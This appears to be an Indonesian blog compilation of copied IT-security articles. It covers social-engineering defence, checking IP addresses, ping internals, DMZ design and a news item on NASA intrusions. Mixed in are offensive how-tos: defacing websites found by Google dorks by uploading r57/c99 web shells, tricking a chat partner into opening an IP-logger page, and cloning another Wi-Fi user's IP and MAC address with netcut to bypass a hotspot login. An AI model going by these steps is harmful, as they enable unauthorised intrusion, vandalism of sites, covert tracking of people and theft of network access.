Solusi Menghindari Resiko
Setelah mengetahui isu social engineering di atas, timbul pertanyaan mengenai bagaimana
cara menghindarinya. Berdasarkan sejumlah pengalaman, berikut adalah hal-hal yang biasa
disarankan kepada mereka yang merupakan pemangku kepentingan aset-aset informasi
penting perusahaan, yaitu:
 Selalu hati-hati dan mawas diri dalam melakukan interaksi di dunia nyata maupun di
dunia maya. Tidak ada salahnya perilaku “ekstra hati-hati” diterapkan di sini
mengingat informasi merupakan aset sangat berharga yang dimiliki oleh organisasi
atau perusahaan;
 Organisasi atau perusahaan mengeluarkan sebuah buku saku berisi panduan
mengamankan informasi yang mudah dimengerti dan diterapkan oleh pegawainya,
untuk mengurangi insiden-insiden yang tidak diinginkan;
 Belajar dari buku, seminar, televisi, internet, maupun pengalaman orang lain agar
terhindar dari berbagai penipuan dengan menggunakan modus social engineering;
 Pelatihan dan sosialisasi dari perusahaan ke karyawan dan unit-unit terkait mengenai
pentingnya mengelola keamanan informasi melalui berbagai cara dan kiat;
 Memasukkan unsur-unsur keamanan informasi dalam standar prosedur operasional
sehari-hari – misalnya “clear table and monitor policy” – untuk memastikan semua
pegawai melaksanakannya; dan lain sebagainya.
Selain usaha yang dilakukan individu tersebut, perusahaan atau organisasi yang bersangkutan
perlu pula melakukan sejumlah usaha, seperti:
 Melakukan analisa kerawanan sistem keamanan informasi yang ada di perusahaannya
(baca: vulnerability analysis);
 Mencoba melakukan uji coba ketangguhan keamanan dengan cara melakukan
“penetration test”;
 Mengembangkan kebijakan, peraturan, prosedur, proses, mekanisme, dan standar
yang harus dipatuhi seluruh pemangku kepentingan dalam wilayah organisasi;
 Menjalin kerjasama dengan pihak ketiga seperti vendor, ahli keamanan informasi,
institusi penanganan insiden, dan lain sebagainya untuk menyelenggarakan berbagai
program dan aktivitas bersama yang mempromosikan kebiasaan perduli pada
keamanan informasi;
 Membuat standar klasifikasi aset informasi berdasarkan tingkat kerahasiaan dan
nilainya;
 Melakukan audit secara berkala dan berkesinambungan terhadap infrastruktur dan
suprastruktur perusahaan dalam menjalankan keamanan inforamsi; dan lain
sebagainya.

d. Deface

Hi semuanya, kembali lagi dengan saya. Kali ini mau berbagi bagaimana cara Deface Website, karena yang request Cara Deface Website ini banyak sekali, bejibun masuk ke email saya. Akhirnya saya membuat artikel ini untuk memenuhi peremintaan kalian semua, let’s DEFACE WEBSITE – DEFACING WEBSITE..

Okelah kalau begitu semuanya, langsung lanjut ajah, skenarionya sebagai berikut:

  1. Anda sudah memiliki target website, kalau masih belum silakan cari di google melalui google dork yang anda punya atau bisa melihat Google Dork Remote File Inclusion – Webapps di http://www.exploit-db.com sampai Anda berhasil mendapatkan Target Website.
  2. Setelah mendapatkan target website, silakan upload SHELL INJECT anda, kebetulan saya menggunakan tools sendiri “File Manager Binus Hacker” :) (Maaf: tidak untuk dipublikasikan) Anda bisa menggunakan r57shell / c99 shell / lainnya. Toolsnya bisa di download disini untuk rshell / c99Download Shell Injection
  3. Setelah anda mengupload Shell Injection, siapkan halaman “DEFACEMENT PAGE“, kebetulan saya menamainya dengan”HACKED.html
  4. Setelah itu silakan kunjungi website target anda yang sudah di Deface.

Penjelasannya detail & langkah-langkahnya:
1. Silakan cari target di google, misalnya: “inurl:page.php?xxx=” atau “intitle: Google Dork” (Kumpulan google dork banyak tersedia di google, silakan di search aja) atau anda bisa melihat list Google Dork Di http://www.exploit-db.com , kemudian inject target website tersebut. Nah, kebetulan saya mendapatkan target dibawah & kemudian melakukan aktifitas shell injection, berikut gambarnya:

2. Langkah selanjutnya, saya melakukan upload fmbh.php (File Manager Binus Hacker), Anda bisa menggunakan Rshell / C99 untuk di upload ke website target tersebut. Directory yang saya pakai di webtarget adalah /vservers/silentcat/htdocs/includes/. Jadi ketika saya membuka shell di target menjadi: http://www.target.com/includes/fmbh.php

 

3. Setelah itu kita siapkan file halaman defacement: “HACKED.html

Kemudian kita save menjadi: “HACKED.html

 

4. Upload “HACKED.html” ke website target tadi, saya melakukan upload di /vservers/silentcat/htdocs/ artinya saya berada di lingkungan home directory.

Sehingga akan tampak hasil upload file “HACKED.html” sebagai berikut:

Dikarenakan permissionnya “600” (rw——-), artinya hanya Owner saja yang bisa melakukan “read & write” di file tersebut, kita harus merubah permissionnya menjadi “777″ / “755″, kalau 777 artinya semuanya memiliki akses “read, write & execute”, sedangkan saya hanya memakai “755″ biar bisa di baca & eksekusi saja:

Defacing Website - CHMOD file

 

5. Jika sudah selesai, maka lihat hasil DEFACE di: “http://www.target.com/hacked.html” , berikut hasil tampilannya:

Nah, sudah selesai.. Cukup mudah melakukan deface website, silakan lakukan eksperimen yang lebih banyak lagi.

– See more at: http://www.binushacker.net/deface-website.html#sthash.GBCoAoS4.dpuf

Dipublikasi di Uncategorized | Meninggalkan komentar

Tools dan Cara Mengetahui :

a. IP Komputer Sendiri

IP Address

Untuk mengetahui IP address komputer banyak sekali cara yang bisa dilakukan diantaranya dengan menggunakan command prompt, melalui status local area connection atau menggunakan tool pihak ketiga lainnya. Kali ini gue akan membahas tips trik windows untukmengetahui IP address komputer dengan cepat dan mudahtanpa menggunakan tool pihak ketiga. Tool windows yang kita gunakan untuk mengetahui IP address adalah command promptTips trik komputer ini bukan merupakan tips trik baru. Namun karena kebetulan ada teman yang menanyakan jadi saya bahas aja pada artikel kali ini. He..he..

Biar ga terlalu banyak basa basi, langsung aja saya berikan langkah-langkahnya:

  1. Seperti pada kebanyakan tips trik komputer dan windows yang saya posting, pertama yang kita lakukan adalah membuka kotak dialog Run dengan mengklik menu start >> Run.
  2. Kemudian ketik cmd dan tekan Enter untuk membuka command prompt.
  3. Pada jendela command prompt ketik “ipconfig” (tanpa tanda kutip) dan tekan Enter.
  4. Setelah itu akan muncul IP address komputer Anda disertai Subnetmask, Gateway dan DNS server yang Anda gunakan.

Cukup mudah bukan? Namun, jika Anda berada pada suatu jaringan LAN dan Anda menggunakan koneksi internet yang merupakan hasil sharing dari komputer lain, maka Anda hanya akan menerima IP Address, Subnet, DNS Server dan Gateway jaringan lokal. Anda tidak akan bisa mengetahui IP, Subnet, DNS, dan Gateway dari Internet Service Provider (ISP) Anda. Tapi jangan khawatir masih ada cara lain kok. Anda cukup menambahkan parameter lain dari command yang Anda ketik pada CMD yaitu parameter “/all” (tanpa tanda kutip). Jadi perintah lengkapnya adalah “ipconfig /all”.
Demikian tips trik windows singkat untuk mengetahui IP address yang bisa saya berikan semoga membantu. Selamat Mencoba!

Atau Dengan cara ini

Beberapa waktu yang lalu blog BismillahGratis ini memposting artikel tentang cara mengetahui IP Address. Pada artikel tersebut kita bisa mengetahui ip address komputer, DNS, dan Gateway dari Internet Service Provider kita secara lengkap. Tool yang kita gunakan Command Prompt dengan hanya mengetikkan perintah “ipconfig /all”.
Kali ini, saya mempunyai sebuah tips dan trik lagi untuk mengetahui IP Address komputer kita dan tool yang digunakan masih sama yaitu CMD. Namun yang berbeda adalah perintahnya. Dengan CMD kita akan memanggil fungsi dari aplikasi Netsh.exe. Netsh.exe adalah sebuah aplikasi yang berfungsi untuk mengetahui pengaturan TCP/IP dari komputer kita. Selain itu, Netsh.exe juga bisa kita gunakan untuk mengkonfigurasi TCP/IP dari LAN card kita. Namun pada kesempatan ini yang saya bahas hanya cara mengetahui konfigurasi IP Address, Subnet Mask dan Gateway dari komputer kita. Berikut langkah-langkahnya:

  1. Seperti pada tips komputer terdahulu yang Anda buka pertama adalah command Prompt.
  2. Caranya adalah dengan klik Start >> Run. Ketik CMD dan tekan Enter.
  3. Pada command prompt, ketik “netsh interface ip show config” dan tekan tombol Enter.
  4. Jika, Local Area Network (LAN) Card Anda telah terkonfigurasi atau terhubung ke LAN maka akan muncul hasil seperti dibawah:
  • Configuration for interface “Local Area Connection”
  • DHCP enabled: No
  • IP Address: 192.168.0.10
  • SubnetMask: 255.255.255.0
  • Default Gateway: 192.168.0.1
  • GatewayMetric: 0
  • InterfaceMetric: 0
  • Statically Configured DNS Servers: 192.168.0.1
  • Statically Configured WINS Servers: None
  • Register with which suffix: Primary Only

Sampai disini semuanya telah selesai. Cukup mudah bukan? Hasil perintah tadi mungkin berbeda pada komputer Anda. Hal ini tergantung dari konfigurasi TCP/IP komputer Anda.
Demikian tips trik windows singkat untuk mengetahui IP Address komputer.

Selamat mencoba.

b. IP Komputer Lain

Tutorial ini digunakan untuk mengetahui IP lawan dengan cara chat di FaceBook.
Hal ini bermanfaat untuk mengidentifikasi lawan melalui media Social Engineering.

Cara Mengetahui IP Lawan

Ada beberapa yang perlu disiapkan yaitu:

  1. Sebuah SERVER HOSTING yang bisa dipakai untuk menyimpan file logger.
  2. Sebuah LINK content / halaman menarik yang dapat digunakan untuk mengalihkan perhatian lawan.
  3. FILE LOGGER itu sendiri.

Instalasi FILE LOGGER kedalam CONTENT:

  1. Bikin sebuah artikel yang indah & menarik, sehingga akan banyak orang yang akan melihat.
  2. Kemudian buatlah file HTML, misalkan simpan difile: “galau.html“.
  3. Pada sela-sela code html tersebut, masukkanlah / inject code logger kedalam source htmlnya.
  4. Sesuaikan / edit alamat email untuk pengiriman hasil IP target di dalam code loggernya.
  5.  Kemudian upload file tersebut ke server hosting.
  6. Pastikan serverhosting memiliki kemampuan  pengiriman email seperti: SMTP / POP3
  7. Nanti file tersebut dibuka dengan: http://www.situsanda.com/galau.html

Cara yang dipakai disini adalah:

  1. Berusaha chatting dengan lembut dan baik dengan lawan chatting kita.
  2. Kemudian rayulah lawan untuk dapat meng-klik LINK yang sudah kita berikan tadi.
  3. Konfirmasikan ke lawan apakah sudah membaca link dengan cara menanyakan apa isi linknya.
  4. Link yang anda kirimkan adalah link logger yang tadi yaitu http://www.situsanda.com/galau.html

Setelah dapat dipastikan bahwa lawan kita sudah melihat link tersebut.

– See more at: http://www.binushacker.net/cara-mengetahui-ip-lawan-via-chatting-facebook.html#sthash.XaaG07E4.dpuf

c. Lokasi berdasarkan IP yg digunakan

Cara Melacak Lokasi Suatu IP Address

Cara Mengecek Lokasi Suatu IP Address Cara Melacak Lokasi Suatu IP Address

Cara Melacak Lokasi Suatu IP Address – Artikel kali ini adalah sebuah artikel yang saya buat dikarenakan adanya pertanyaan mengenai artikel saya sebelumnya yang bertemakan Sembunyikan IP Dengan Real Hide IP.Ada salah seorang pengunjung bagaimana Cara Melacak Lokasi Suatu IP Address ?? Dikarenakan saya sedang tidak berada didepan laptop saya tidak bisa memberikan petunjuk yang jela,dan akhirnya saya membuat artikel saya yang ini.

Cara Melacak Lokasi Suatu IP Address ini sebenanrnya digunakan untuk orang yang ingin mengetahui dimana letak IP Address yang dicari.Melacak Lokasi Suatu IP Addresssebenarnya gampang tidak terlalu susah,sebenarnya teman – teman dapat mencari dari pencarian google dengan kata kunci Cara Melacak IP Address namun saya langsung membuatkan saja mengenai bagaimana Cara Melacak Lokasi Suatu IP Address.

Mari kita lihat beberapa tools yang sering saya gunakan dalam mencari Lokasi suatu IP Address :

Cara Mengecek Lokasi Suatu IP Address

Berikut ini adalah 2 tools online yang sering saya gunakan untuk melakukan tracert IP yang mencurigakan kepada blog saya :

bannerpanjang Cara Melacak Lokasi Suatu IP Address

Disana teman – teman tinggal memasukan alamat IP Address yang teman – teman ingin trace atau lacak dimana lokasinya IP Address tersebut.Bagaimana ?? Mudah bukan ?? Teman – teman sekarang bisa tau darimana saja IP Address tersebut berasal.

Mungkin sekian dulu informasi sederhana saya mengenai bagaimana Cara Melacak Lokasi Suatu IP Address,semoga dengan adanya informasi sederhana yang saya berikan ini dapatMelacak Lokasi Suatu IP Address yang ingin teman – teman cari keberadaannya.

Sekian dulu informasi sederhana saya dan silahkan teman – teman mencobanya sendiri dalam melakukan sebuah tracert atau pelacakan.Sekaian informasi sederhana saya mengenai bagaimana Cara Melacak Lokasi Suatu IP Address.

d. Hide IP

Memang banyak cara menuju roma untuk menghindari blok situs pada komputer dari mengganti proxy menggunakan web online proxy tapi ternyata dari cara tersebut sudah sering diketahui dari kebanyakan. Jadi bagaimana kita menyembunyikan IP dan aman menjelajahi web secara anonim? saya akan mengatakan VPN mungkin adalah solusi terbaik dan utama untuk melewati sensor internet dengan cara yang aman.

VPN adalah singkatan dari virtual private network, yaitu jaringan pribadi (bukan untuk akses umum) yang menggunakan medium nonpribadi (misalnya internet) untuk menghubungkan antar remote-site  secara aman. Perlu penerapan teknologi  tertentu agar walaupun menggunakan medium yang umum, tetapi traffic  (lalu lintas) antar remote-site tidak dapat disadap dengan mudah, juga tidak memungkinkan pihak lain untuk menyusupkan traffic  yang tidak semestinya ke dalam remote-site.

Mungkin, yang paling populer di antara semua penyedia VPN bebas adalah Hotspot Shield adalah OpenVPN berbasis privasi dan alat keamanan, digunakan untuk mengenkripsi browsing web anda ketika di hotspot publik dan untuk menghindari filter web.

Berikut adalah langkah-langkah untuk menggunakannya.

Download Hotspot Shield dan kemudian menginstal paket tersebut. Jadi, jika Anda menggunakan layanan VPN, anda dapat mengunjungi situs-situs yang telah di filter sama halnya ketika anda berada dalam jaringan terbatas atau disensor dan menggunakan VPN untuk terhubung ke jaringan tersebut. Beberapa layanan VPN populer dan gratis yang dapat membantu anda menjelajahi web sebebas mungkin tanpa khawatir tentang privasi dan masalah sensor.

Pastikan saat melakukan instalasi anda terkoneksi dengan internet seperti yang terlihat pada gambar dibawah ini :

VPN Cara Hide IP, Jelajahi Web secara anonim dan Akses Situs yang DibatasiSetelah selesai download tersebut lakukan instalasi pada bagian instalasi pada gambar dibawah ini anda bisa melakukan pengaturan yang ingin anda gunakan.

VPN1 Cara Hide IP, Jelajahi Web secara anonim dan Akses Situs yang Dibatasi

Klik Next dan jika ada jendela yang menandakan klik install setelah selesai anda akan melihat pada icon di taskbar

VPN3 Cara Hide IP, Jelajahi Web secara anonim dan Akses Situs yang Dibatasi

Klik kanan pada ikon program di taskbar untuk mengaktifkan koneksi VPN aktif atau nonaktif. Tidak perlu mendaftar atau membayar untuk layanan tersebut, tetapi Anda akan menerima iklan dan kadang-kadang terpaksa URL diredirect.

e. Numpang IP Lain
Tutorial ini sangat mudah, kita hanya membutuhkan aplikasi netcut untuk menumpang IP client yang sudah terhubung ke Wi-Fi (Wireless Fidelity). Lho kok cuma numpang?, kalo pengen full gratisannya, bayar donk ke yang punya WiFi. Tapi tenang saja, biarpun numpang tapi kita masih dapat mengakalinya agar koneksi internet kita lancar. Nah, langsung saja berikut ini langkah-langkahnya:
1. Download netcut disini, kemudian install.
2. Setelah proses instalasi selesai, koneksikan PC kita ke Wi-Fi (hotspot) target (securitynya mikrotik). Kalau sudah konek, kita akan mendapatkan IP Address, berbeda dengan hotspot yang keamannya wep atau wpa.
3. Lihat juga DNS Server kita. Caranya, masukkan perintah “ipconfig/all” (tanpa tanda petik) di Command Prompt (cmd).
4. Buka browser kesayangan anda, masukkan url terserah, anda akan dialihkan ke halaman login, kurang lebih seperti pada gambar.
5. Untuk membypass login tersebut, buka program netcut, kemudian klik Choice NetCard dan pilih Wireless Network Adapter anda. Pada contoh, netwok adapter yang aku gunakan Atheros AR5B97.
6. Pada halaman utama netcut, tertera daftar IP client yang terkoneksi ke jaringan wi-fi, beserta host name dan MAC Address (Physical Address). Pilih IP target, yang jelas bukan IP kita dan bukan IP Server (GateWay IP).
7. Copy IP target beserta MAC Addressnya di notepad, untuk memudahkan klik tab Print Table.
Misal, pada contoh IP target 10.10.1.57 dengan MAC Address 88:C6:63:A7:24:0E, aku pilih yang nggak ada host name nya karena biasanya korban menggunakan HP. Jadi kalau korban menggunakan HP pasti dia tidak menghabiskan bandwith.
8. Setelah itu, disconnect dulu. Ubah MAC Address kita sama seperti MAC Address target. Ingat, beda network adapter beda Property, pokoknya pada intinya pilih yang berbau Adrress, MAC dan Network. Pada contoh nama propertynya Network Address.
Untuk mengubah MAC Address dapat juga menggunakan Technitium MAC Address Changer.
9. Ubah juga IP Address kita sama seperti IP target, serta ubah DNS Server Address. Untuk mengisi DNS Server, lihat point 3.
10. Setelah IP dan MAC Address kita sudah sama seperti IP target, koneksikan kembali PC kita ke Wi-Fi tujuan dan tunggu sampai konek.
11. Happy browsing.
f. Ping ke komputer lain
PING
Apa itu test Ping? Bagaimana melakukan Test Ping dari PC saya?
Test Ping adalah metode untuk melakukan tes koneksi dengan Command Prompt (Windows) untuk mengetahui kualitas koneksi jaringan dari PC anda ke jaringan ditempat lain yang telah terhubung ke PC anda baik itu melalui jaringan lokal (intranet) ataupun jaringan luas (internet).
Cara melakukan test ping dari PC anda:
  1. Buka Command Prompt, Start -> Program -> Accessories -> Command Prompt atau dengan mengetik cmd dari RUN.
  2. Pada Command Prompt ketik perintah ping ip address parameter (parameter diberikan sesuai keperluan). Misalnya perintah ping 203.84.136.33 -n 100
    Tambahan parameter -n 100 yang akan menghasilkan reply sebanyak 100 kali.
    Sebagai tambahan, parameter adalah aksesori kelengkapan perintah dari suatu perintah utama. Dalam pembahasan ini, ping mempunyai banyak parameter, diantaranya adalah -t (terus menerus), -n angka (ditentukan berdasarkan angka) dll.
  3. Jika koneksi lancar dan tidak ada gangguan maka akan muncul pesan reply
  4. Jika koneksi terputus atau ada masalah maka akan muncul pesan “Request Timed Out”.
  5. Anda juga bisa melakukan test ping langsung ke domain name (tanpa perlu mengetikkan ip addressnya) , contoh “ping yahoo.com”.
PERJALANAN PING
Pada contoh ini, seorang user di Host A melakukan ping ke alamat IP Host B. Mari kita cermati langkah demi langkah perjalanan datanya :
  1. Internet Control Message Protocol (ICMP) menciptakan sebuah payload (data) pemintaan echo (di mana isinya hanya abjad di field data).
  2. ICMP menyerahkan payload tersebut ke Internet Protocol (IP), yang lalu menciptakan sebuah paket. Paling sedikit, paket ini berisi : sebuah alamat asal IP, sebuah alamat tujuan IP, dan sebuah field protocol dengan nilai 01h (ingat bahwa Cisco suka menggunakan 0x di depan karakter heksadesimal , jadi di router mungkin terlihat seperti 0×01). Semua itu memberitahukan kepada host penerima tentang kepada siapa host penerima harus menyerahkan payload ketika network tujuan telah dicapai – pada contoh ini host menyerahkan payload kepada protocol ICMP.
  3. Setelah paket dibuat, IP akan menentukan apakah alamat IP tujuan ada di network local atau network remote.
  4. Karena IP menentukan bahwa ini adalah permintaan untuk network remote, maka paket perlu dikirimkan ke default gateway agar paket dapat di route ke network remote. Registry di Windows dibaca untuk mencari default gateway yang telah dikonfigurasi.
  5. Default gateway dari host 192.168.0.7 (Host A) dikonfigurasi ke 192.168.0.1. Untuk dapat mengirimkan paket ini ke default gateway, harus diketahui dulu alamat hardware dari interface Ethernet 0 dari router (yang dikonfigurasi dengan alamat IP 192.168.0.1 tersebut) Mengapa demikian? Agar paket dapat diserahkan ke layer data link, lalu di-enkapsulasi menjadi frame, dan dikirimkan ke interface router yang terhubung ke network 192.168.0.0. Host berkomunikasi hanya dengan alamat hardware pada LAN local. Penting untuk memahami bahwa Host A, agar dapat berkomunikasi dengan Host B, harus mengirimkan paket ke alamat MAC (alamat hardware Network adapter (LAN Card) dari default gateway di network local.
  6. Setelah itu, cache ARP dicek untuk melihat apakah alamat IP dari default gateway sudah pernah di resolved (diterjemahkan) ke sebuah alamat hardware:
    Jika sudah, paket akan diserahkan ke layer data link untuk dijadikan frame (alamat hardaware dari host tujuan diserahkan bersama tersebut).
    Jika alamat hardware tidak tersedia di cache ARP dari host, sebuah broadcast ARP akan dikirimkan ke network local untuk mencari alamat hardware dari 192.168.0.1. Router melakukan respon pada permintaan tersebut dan menyerahkan alamat hardware dari Ethernet 0, dan host akan menyimpan (cache) alamat ini. Router juga akan melakukan cache alamat hardware dari host A di cache ARP nya.
  7. Setelah paket dan alamat hardware tujuan diserahkan ke layer data link, maka driver LAN akan digunakan untuk menyediakan akses media melalui jenis LAN yang digunakan (pada contoh ini adalah Ethernet). Sebuah frame dibuat, dienkapsulasi dengan informasi pengendali. Di dalam frame ini alamat hardware dari host asal dan tujuan, dalam kasus ini juga ditambah dengan field EtherType yang menggambarkan protocol layer network apa yang menyerahkan paket tersebut ke layer data link- dalam kasus ini, protocol itu adalah IP. Pada akhir dari frame itu terdapat sebuah field bernama Frame Check Sequence (FCS) yang menjadi tempat penyimpanan dari hasil perhitungan Cyclic Redundancy Check (CRC).
  8. Setelah frame selesai dibuat, frame tersebut diserahkan ke layer Physical untuk ditempatkan di media fisik ( pada contoh ini adalah kabel twisted-pair) dalam bentuk bit-bit, yang dikirim saru per satu.
  9. Semua alat di collision domain menerima bit-bit ini dan membuat frame dari bit-bit ini. Mereka masing-masing melakukan CRC dan mengecek jawaban di field FCS. Jika jawabannya tidak cocok, frame akan dibuang.
    Jika CRC cocok, maka alamat hardware tujuan akan di cek untuk melihat apakah alamat tersebut cocok juga (pada contoh ini, dicek apakah cocok dengan interface Ethernet 0 dari router).
    Jika alamat hardware cocok, maka field Ether-Type dicek untuk mencari protocol yang digunakan di layer Network dengan cara :
  10. Paket ditarik dari frame, dan apa yang tertinggal di frame akan dibuang. Paket lalu diserahkan ke protocol yang tercatat di field Ether-Type—pada contoh ini adalah IP.
  11. IP menerima paket dan mengecek alamat tujuan IP. Karena alamat tujuan dari paket tidak sesuai dengan semua alamat yang dikonfigurasi di router penerima itu sendiri, maka router penerima akan melihat pada alamat IP network tujuan di routing tablenya.
    Routing table harus memiliki sebuah entri di network 192.168.10.0, jika tidak paket akan dibuang dengan segera dan sebuah pesan ICMP akan dikirimkan kembali ke alamat pengirim dengan sebuah pesan “destination network unreachable” (network tujuan tidak tercapai)
    Jika router menemukan sebuah entri untuk network tujuan di tabelnya, paket akan dialihkan ke interface keluar (exit interface)—pada contoh, interface keluar ini adalah interface Ethernet 1.
  12. Router akan melakuakan pengalihan paket ke buffer Ethernet 1.
    Buffer Ethernet 1 perlu mengetahui alamat hardware dari host tujuan dan pertama kali ia akan mengecek cache ARP-nya.
  13. Jika alamat hardware dari Host B sudah ditemukan, paket dan alamat hardware tersebut akan diserahkan ke layer data link untuk dibuat menjadi frame.
  14. Jika alamat hardware tidak pernah diterjemahkan atau di resolved oleh ARP (sehingga tidak dicatat di cache ARP), router akan mengirimkan sebuah permintaan ARP keluar dari interface E1 untuk alamat hardware 192.168.10.3.
Host B melakukan respond dengan alamat hardwarenya, dan paket beserta alamat hardware tujuan akan dikirimkan ke layer data link untuk dijadikan frame.
  1. Layer data link membuat sebuah frame dengan alamat hardware tujuan dan asal , field Ether-Type, dan field FCS di akhir dari frame. Frame diserahkan ke layer Physical untuk dikirimkan keluar pada medium fisik dalam bentuk bit yang dikirimkan satu per satu.
  2. Host B menerima frame dan segera melakuakan CRC. Jika hasil CRC sesuai dengan apa yang ada di field FCS, maka alamat hardware tujuan akan dicek. Jika alamat host juga cocok, field Ether-Type akan di cek untuk menentukan protocol yang akan diserahi paket tersebut di layer Network—Pada contoh ini, protocol tersebut adalah IP.

sumber: http://www.thejagat.com/free_artikel/245/Networking/217/deskripsi_lengkap_tentang_ping_.html

Dipublikasi di Uncategorized | Meninggalkan komentar

Membangun Keamanan Jaringan Komputer Dengan Sistem De-Militarised Zone (DMZ)

De-Militarised Zone(DMZ) merupakan mekanisme untuk melindungi sistem internal dari serangan hacker atau pihak-pihak lain yang ingin memasuki sistem tanpa mempunyai hak akses. Sehingga karena DMZ dapat diakses oleh pengguna yang tidak mempunyai hak, maka DMZ tidak mengandung rule. .Secara esensial, DMZ melakukan perpindahan semua layanan suatu jaringan ke jaringan lain yang berbeda. DMZ terdiri dari semua port terbuka, yang dapat dilihat oleh pihak luar. Sehingga jika hacker menyerang dan melakukan cracking pada server yang mempunyai DMZ, maka hacker tersebut hanya dapat mengakses host yang berada pada DMZ, tidak pada jaringan internal.  Misalnya jika seorang pengguna bekerja di atas server FTP pada jaringan terbuka untuk melakukan akses publik seperti akses internet, maka hacker dapat melakukan cracking pada server FTP dengan memanfaatkan layanan Network Interconnection  System (NIS), dan Network File System (NFS). Sehingga hacker tersebut dapat mengakses seluruh sumber daya jaringan, atau jika tidak, akses jaringan dapat dilakukan dengan sedikit upaya, yaitu dengan menangkap paket yang beredar di jaringan, atau dengan metoda yang lain. Namun dengan menggunakan lokasi server FTP yang berbeda, maka hacker hanya dapat mengakses DMZ tanpa mempengaruhi sumber daya jaringan yang lain. Selain itu dengan melakukan pemotongan jalur komunikasi pada jaringan internal, trojan dan sejenisnya tidak dapat lagi memasuki jaringan.Makalah ini akan membahas bagaimana memberi hak pada pengguna baik internal maupun eksternal, pada semua layanan jaringan yang diperlukan.

DMZ adalah suatu area  bagi hackers yang digunakan untuk melindungi system internal yang berhubungan dengan serangan hacker (hack attack). DMZ bekerja pada seluruh dasar pelayanan jaringan yang membutuhkan akses terhadap jaringan “ Internet atau dunia luar” ke bagian jaringan yang lainnya. Dengan begitu, seluruh “open port” yang berhubungan dengan dunia luar akan berada pada jaringan, sehingga jika seorang hacker melakukan serangan dan melakukan crack pada server yang menggunakan sistem DMZ, hacker tersebut hanya akan dapat mengakses hostnya saja, tidak pada jaringan internal. Secara umum DMZ dibangun berdasarkan tiga buah konsep, yaitu: NAT (Network Address Translation), PAT (Port Addressable Translation), dan Access List. NAT berfungsi untuk menunjukkan kembali paket-paket yang datang dari “real address” ke alamat internal. Misal : jika kita memiliki “real address” 202.8.90.100, kita dapat membentuk suatu NAT langsung secara otomatis pada data-data yang datang ke 192.168.100.4 (sebuah alamat jaringan internal). Kemudian PAT berfungsi untuk menunjukan data yang datang pada particular port, atau range sebuah port dan protocol (TCP/UDP atau lainnya) dan alamat IP ke sebuah particular port atau range sebuah port ke sebuah alamat internal IP. Sedangkan access list berfungsi untuk mengontrol secara tepat apa yang datang dan keluar dari jaringan dalam suatu pertanyaan. Misal : kita dapat menolak atau memperbolehkan semua ICMP yang datang ke seluruh alamat IP kecuali untuk sebuah ICMP yang tidak diinginkan.

Network Address Translation(NAT) berfungsi untuk mengarahkan alamat riil, seperti alamat internet, ke bentuk alamat internal. Misalnya alamat riil 202.8.90.100 dapat diarahkan ke bentuk alamat jaringan internal 192.168.0.1 secara otomatis dengan menggunakan NAT. Namun jika semua informasi secara otomatis ditranslasi ke bentuk alamat internal, maka tidak ada lagi kendali  terhadap informasi yang masuk. Oleh karena itu maka muncullah PAT.

Port Address Translation(PAT) berfungsi untuk mengarahkan data yang masuk melalui port, sekumpulan port dan protokol, serta alamat IP pada port atau sekumpulan post. Sehingga dapat dilakukan kendali ketat pada setiap data yang mengalir dari dan ke jaringan.

Daftar Akses melakukan layanan pada pengguna agar dapat mengendalikan data jaringan. Daftar Akses dapat menolak atau menerima akses dengan berdasar pada alamat IP, alamat IP tujuan, dan tipe protokol.

Kesimpulan

DMZ adalah suatu area  bagi hackers yang digunakan untuk melindungi system internal yang berhubungan dengan serangan hacker (hack attack). DMZ bekerja pada seluruh dasar pelayanan jaringan yang membutuhkan akses terhadap jaringan “ Internet atau dunia luar” ke bagian jaringan yang lainnya. Dengan begitu, seluruh “open port” yang berhubungan dengan dunia luar akan berada pada jaringan, sehingga jika seorang hacker melakukan serangan dan melakukan crack pada server yang menggunakan sistem DMZ, hacker tersebut hanya akan dapat mengakses hostnya saja, tidak pada jaringan internal. Secara umum DMZ dibangun berdasarkan tiga buah konsep, yaitu: NAT (Network Address Translation), PAT (Port Addressable Translation), dan Access List. NAT berfungsi untuk menunjukkan kembali paket-paket yang datang dari “real address” ke alamat internal. Misal : jika kita memiliki “real address” 202.8.90.100, kita dapat membentuk suatu NAT langsung secara otomatis pada data-data yang datang ke 192.168.100.4 (sebuah alamat jaringan internal). Kemudian PAT berfungsi untuk menunjukan data yang datang pada particular port, atau range sebuah port dan protocol (TCP/UDP atau lainnya) dan alamat IP ke sebuah particular port atau range sebuah port ke sebuah alamat internal IP. Sedangkan access list berfungsi untuk mengontrol secara tepat apa yang datang dan keluar dari jaringan dalam suatu pertanyaan. Misal : kita dapat menolak atau memperbolehkan semua ICMP yang datang ke seluruh alamat IP kecuali untuk sebuah ICMP yang tidak diinginkan.

Untuk mencapai suatu keamanan suatu jaringan komputer yang optimal diperlukan  suatu koordinasi antara pengguna dan Administrator serta  aturan/rule atau otorisasi dalam penggunaan jaringan tsb . Dilain pihak agar diupayakan adanya update software secara berkala  serta menyesuaikan hardwarenya dengan perkembangan teknologi terbaru.

sumber: (http://www.esaunggul.ac.id/article/membangun-keamanan-jaringan-komputer-dengan-sistem-de-militarised-zone-dmz/)

Dipublikasi di Uncategorized | Meninggalkan komentar

Berita terbaru dari Dunia IT

Badan Angkasa Luar Amerika Serikat (NASA) telah mengungkap sejumlah insiden peretasan sistem oleh para hacker. Sebanyak 13 jaringan utama berhasil ditembus. Ini tindakan kriminal yang membahayakan sistem keamanan nasional Amerika Serikat.

Inspektur Jenderal NASA, Paul Martin menyatakan, pihaknya menemukan, pembobolan oleh hacker ini terjadi sejak November tahun lalu melalui jaringan internet di Cina, yang menembus jaringan Laboratorium Jet Propulsion. Untuk diketahui, Jet Laboratorium Propulsion, sedang mengelola 23 pesawat angkasa untuk melakukan misi ke planet Jupiter, Mars dan Saturnus.

Dia mengatakan bahwa hacker mendapatkan sistem akses lengkap, yang memungkinkan untuk melakukan perubahan, menyalin data, atau menghapus dokumen penting, dengan membuat data baru dan mem*********kkan semua data yang memungkinkan akan adanya pencurian data NASA lainnya. Hacker ini juga mampu menyembunyikan identitas untuk menyembunyikan aksinya ini.
Seperti yang diungkapkan Martin, bahwa penyusup tersebut, dikaji telah memanfaatkan semua data yang penting, dan memberikan kesempatan ‘pembajak’ lain untuk m*********k ke dalam akses ini.

Dalam serangan lain pada tahun lalu, penyusup mencuri lebih dari 150 sistem NASA. Martin mengatakan bahwa kantornya mengidentifikasi bahwa ribuan sistem keamanan komputer di lembaga tersebut pada tahun 2010 dan 2011.
